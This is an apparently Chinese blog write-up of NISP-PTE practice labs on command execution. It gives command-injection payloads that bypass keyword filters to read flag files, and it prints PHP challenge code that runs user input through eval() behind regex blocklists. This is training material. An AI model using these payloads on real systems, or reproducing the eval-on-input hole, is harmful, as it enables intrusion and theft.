当前位置: 首页 > news >正文

NISP-PTE基础实操——命令执行

news 2025/7/23 6:41:34

模拟1 

127.0.0.1|ca''t ../key.flag

查看源代码: 

模拟2

127.0.0.1|ca''t /flag.php

模拟3

第一题

第二题

模拟4 

查看源代码 

127.0.0.1|c"a"t /nisp92234/flag.ph*

模拟5

;cat</flag.php

模拟6

/?cmd=echo%20`tac flag.php`;

模拟7

 flag_nisp_033bbc

模拟8

<?php
# flag in flag.php
include("flag.php");
if(isset($_GET['cmd'])){$cmd = $_GET['cmd'];if(!preg_match("/system|exec|highlight|show_source|include|passthru|echo|print_r|cat|head|tail|more|less/i",$cmd)){if(preg_match("/flag/i",$cmd)){eval($cmd);} else {die("HACK!!");}} else {die("HACK!!!");}
} else {highlight_file(__FILE__);
}
?>

模拟9

<?php
# flag in flag.php
include("flag.php");
if(isset($_GET['cmd'])){$cmd = $_GET['cmd'];if(!preg_match("/system|exec|highlight|show_source|include|passthru|php|flag|print_r|cat|head|tail|more|less/i",$cmd)){if(preg_match("/\?|\*/i",$cmd)){eval($cmd);} else {die("HACK!!");}} else {die("HACK!!!");}
} else {highlight_file(__FILE__);
}
?>
/?cmd=echo%20`tac%20fla?.???`;

模拟10

<?php
# flag in flag.php
include("flag.php");
if(isset($_GET['cmd'])){$cmd = $_GET['cmd'];if(!preg_match("/system|exec|highlight|show_source|include|passthru|php|flag|print_r|cat|head|tail|more|less|;/i",$cmd)){if(preg_match("/\?|>/i",$cmd)){eval($cmd);} else {die("HACK!!");}} else {die("HACK!!!");}
} else {highlight_file(__FILE__);
}
?>
/?cmd=echo%20`tac%20fla*.???`?>
http://www.dtcms.com/a/292238.html

相关文章:

  • MySQL高可用主从复制原理及常见问题
  • mysql_innodb_cluster_metadata源数据库
  • n1 armbian docker compose 部署aipan mysql
  • 板凳-------Mysql cookbook学习 (十二--------5)
  • vue3实现高性能pdf预览器功能可行性方案及实践(pdfjs-dist5.x插件使用及自定义修改)
  • Redis高级篇之最佳实践
  • VUE 中父级组件使用JSON.stringify 序列化子组件传递循环引用错误
  • TDengine时序数据库 详解
  • 扣子Coze智能体实战:自动化拆解抖音对标账号,输出完整分析报告(喂饭级教程)
  • STM32-SPI全双工同步通信
  • 什么是分布式事务,分布式事务的解决方案有哪些?
  • PyTorch 模型开发全栈指南:从定义、修改到保存的完整闭环
  • 自编码器表征学习:重构误差与隐空间拓扑结构的深度解析
  • vue2.0 + elementui + i18n:实现多语言功能
  • 智能Agent场景实战指南 Day 18:Agent决策树与规划能力
  • SpringBoot+Mybatis+MySQL+Vue+ElementUI前后端分离版:权限管理(三)
  • Class10简洁实现
  • 图解Spring的循环依赖
  • 2025茶吧机语音控制集成方案
  • 深入解析Hadoop中的推测执行:原理、算法与策略
  • 【华为机试】684. 冗余连接
  • Python编程进阶知识之第三课处理数据(numpy)
  • LSTM+Transformer炸裂创新 精准度至95.65%
  • 【C++】复习重点-汇总2-面向对象(三大特性、类/对象、构造函数、继承与派生、多态、抽象类、this/对象指针、友元、运算符重载、static、类/结构体)
  • vscode gdb调试c语言过程
  • IDEA-自动格式化代码
  • IDEA全局Maven配置
  • 【IDEA】如何在IDEA中通过git创建项目?
  • 【C++】nlohmann/json
  • 哔哩哔哩视觉算法面试30问全景精解